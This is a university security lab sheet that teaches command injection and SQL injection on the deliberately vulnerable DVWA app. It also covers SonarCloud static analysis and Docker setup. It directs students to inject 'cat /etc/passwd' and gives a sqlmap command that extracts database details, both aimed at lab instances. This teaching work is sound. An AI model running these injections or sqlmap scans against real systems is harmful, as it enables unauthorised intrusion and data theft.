QSES - Laboratory Exercises 1

Author: Eduardo R. B. Marques, DCC/FCUP

QSES homepage

Exercises marked with (C) will be covered in class, and exercises marked with (H) are left as homework.

1. DVWA command injection (C)

Aim: experiment with DVWA to understand command injection vulnerabilities, and related input validation for each DVWA security level.

1. Access the DVWA server instance that will be running (temporarily) during class at http://qses.dnsabr.com.

2. You may login with user name admin and password password.

   

3. Access the Command Injection page using the menu on the left. It will let you specify a IP adddress (e.g. 127.0.0.1) such that the DVWA server executes the ping command internally to that IP, and then reports the output of the ping command.

   

4. Exploit vulnerabilities by supplying malicious input that leads to ("injects") the execution of command

   cat /etc/passwd

   • Scroll down the page and click on View Source to observe the code that is is executed on the server side. Analyze the code to understand the input validation mechanism (if any). You can also click on View Help for an explanation of the input validation mechanisms and vulnerability exploitation hints.

     

     • Source code window:

     

     • Help page fragment:

     

5. Change the DVWA Security Level , initially set to Low, and repeat step 4 for the Medium, High and finally the Impossible security levels.

   

2. SonarCloud analysis of DVWA command injection (C)

Aim: observe issues detected through static code analysis using SonarCloud for the DVWA command injection example.

1. Open https://sonarcloud.io/dashboard?id=QSES_DVWA in your browser.

   

2. Access the Code tab, then browse the vulnerabilities/exec/ source folder → direct link.

   

3. Click on low.php, where 2 security vulnerabilities were detected, each corresponding to a call to shell_exec.

   

You will notice that command injection vulnerabilities are detected in low.php but not for all the remaning cases. The analysis only signals the cases where external input directly reaches the shell_exec call without any intervening input validation.

3. DVWA and SQLi (C)

Aim: again using DVWA, understand SQL injection vulnerabilities and the related input validation for each DVWA security level.

Consider DVWA's SQL injection and Blind SQL injection pages, and:

1. As in exercise 1, examine the input validation mechanisms and try to exploit the vulnerabilities.
2. As in exercise 2, browse the SonarCloud reports to observe what SQL injection vulnerabilities have been identified through static analysis.

4. Set up Docker and run a DVWA container (H)

Aim: use your PC to run DVWA (and other tools in the future) using Docker.

1. Install Docker Desktop for Windows and MacOS, or Docker Community Engine for Linux.

2. Run the DVWA Docker image using the following Docker command:

   docker run --rm -it -p 9999:80 vulnerables/web-dvwa

   The -p 9999:80 option indicates that port 80 on the DVWA container will be redirected to port 9999 on the host. You may use other values in place of 9999.

3. Open your browser and access http://127.0.0.1:9999.

5. Pen-testing for SQLi using sqlmap (H)

1. You must have Python installed.
2. Download sqlmap.

3. Conduct a pen-test over DVWA, e.g.

   python ./sqlmap.py \
   -u "http://127.0.0.1:9999/vulnerabilities/sqli/id=2&Submit=Submit#" \
   --cookie="PHPSESSID=. . . . .; security=low” \ 
   -b --current-db --current-user  

   You must fill in the value of PHPSESSID above. To find it, access the PHP Info page and consult the PHP Variables section.

6. Set up GitHub and SonarCloud accounts (H)

Aim: familiarize yourself with basic aspects of SonarCloud setup in integration with GitHub, again using DVWA as an example.

1. Create a GitHub account if you don't have one.
2. Log in to GitHub.
3. Fork the DVWA repository available at https://github.com/qses/DVWA. After this step, a DVWA repository will exist in your account.
4. Sign-up with SonarCloud by choosing the GitHub login option
5. Follow the instructions to create a Sonarcloud project and select your DVWA repository for analyis. Note that the forked repository already contains a .sonarcloud.properties file, so you do not need to create a new one.
6. Once the project setup is done, the Sonarcloud automated analysis will begin and take a few minutes. Wait until finished, and then browse the generated reports.

7. Experiment with ShellShock (H)

Aim: experiment with a real-world example of command injection.

See instructions here on how to run a Docker container that is vulnerable to ShellShock and exploit the vulnerability.